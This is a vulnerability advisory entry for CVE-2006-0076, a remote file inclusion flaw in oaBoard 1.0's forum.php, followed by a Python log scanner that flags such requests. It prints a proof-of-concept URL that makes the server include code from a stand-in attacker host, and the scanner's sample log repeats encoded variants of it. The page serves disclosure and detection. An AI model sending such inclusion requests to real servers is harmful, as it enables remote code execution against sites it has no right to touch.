OABoard Forum Script Remote File Inclusion Vulnerability

Vulnerability ID: 1109572    Vulnerability type: Input validation
Published: 2005-12-29    Updated: 2006-09-21
CVE ID: CVE-2006-0076    CNNVD-ID: CNNVD-200601-012
Affected platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/26998
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-012
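|Vulnerability details
A PHP remote file inclusion vulnerability exists in forum.php in oaBoard 1.0. A remote attacker can execute arbitrary PHP code via a URL in the inc parameter.
|Vulnerability EXP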
source: http://www.securityfocus.com/bid/16105/info

The oaBoard application is prone to a remote file-include vulnerability. As a result, remote users may specify external PHP scripts to be included by the application.

This could result in the execution of arbitrary PHP code in the context of the webserver hosting the application. 

http://oaboard.example.com/oaboard_en/forum.php?inc=http://attacker.example.com/code.php
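
Added example (not part of the original advisory or of oaBoard): a log check that flags requests to forum.php whose inc parameter carries a URL scheme or remote path, which is the request shape described above. The log lines are constructed samples in combined log format; the function names and the extra decoding rounds for proxy-written logs are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines; addresses are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2006:10:00:00 +0000] "GET /oaboard_en/forum.php?inc=http://attacker.example.com/code.php HTTP/1.1" 200 512
192.0.2.11 - - [01/Jan/2006:10:00:05 +0000] "GET /oaboard_en/forum.php?inc=topics HTTP/1.1" 200 2048
192.0.2.12 - - [01/Jan/2006:10:00:09 +0000] "GET /oaboard_en/forum.php?x=1&inc=hTTp%3A%2F%2Fattacker.example.com%2Fcode.php HTTP/1.1" 200 512
192.0.2.13 - - [01/Jan/2006:10:00:12 +0000] "GET /oaboard_en/forum.php?inc=%2568ttp://attacker.example.com/code.php HTTP/1.1" 200 512
192.0.2.14 - - [01/Jan/2006:10:00:20 +0000] "GET /index.php?inc=http://attacker.example.com/code.php HTTP/1.1" 404 0
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Any scheme prefix (http:, ftp:, php:, data:, ...), protocol-relative //host,
# or a UNC path. A legitimate include name never needs one of these.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.I)


def fully_decode(value, rounds=3):
    """Undo leftover percent-encoding layers (assumed: proxy-written logs)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_text, script="forum.php", param="inc"):
    """Return (client, decoded value) for each suspicious inc= request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/" + script):
            continue
        # parse_qsl removes one encoding layer, as PHP does for $_GET.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = fully_decode(value)
            if name == param and REMOTE_RE.match(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in find_rfi_attempts(SAMPLE_LOG):
        print(client, value)
```

Only the query string is inspected, so a value sent in a POST body will not appear in a standard access log and needs request-body logging to be seen.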
|References

Source: BID
Name: 16105
Link: http://www.securityfocus.com/bid/16105
Source: BUGTRAQ
Name: 20060531 Re: OaBoard 1.0 Remote File inclusion
Link: http://www.securityfocus.com/archive/1/archive/1/435859/100/0/threaded
Source: BUGTRAQ
Name: 20060530 OaBoard 1.0 Remote File inclusion
Link: http://www.securityfocus.com/archive/1/archive/1/435371/100/0/threaded
Source: BUGTRAQ
Name: 20060101 [eVuln] oaBoard PHP Code Execution
Link: http://www.securityfocus.com/archive/1/archive/1/420676/100/0/threaded
Source: SECTRACK
Name: 1016211
Link: http://securitytracker.com/id?1016211
Source: MISC
Link: http://evuln.com/vulns/3/summary.html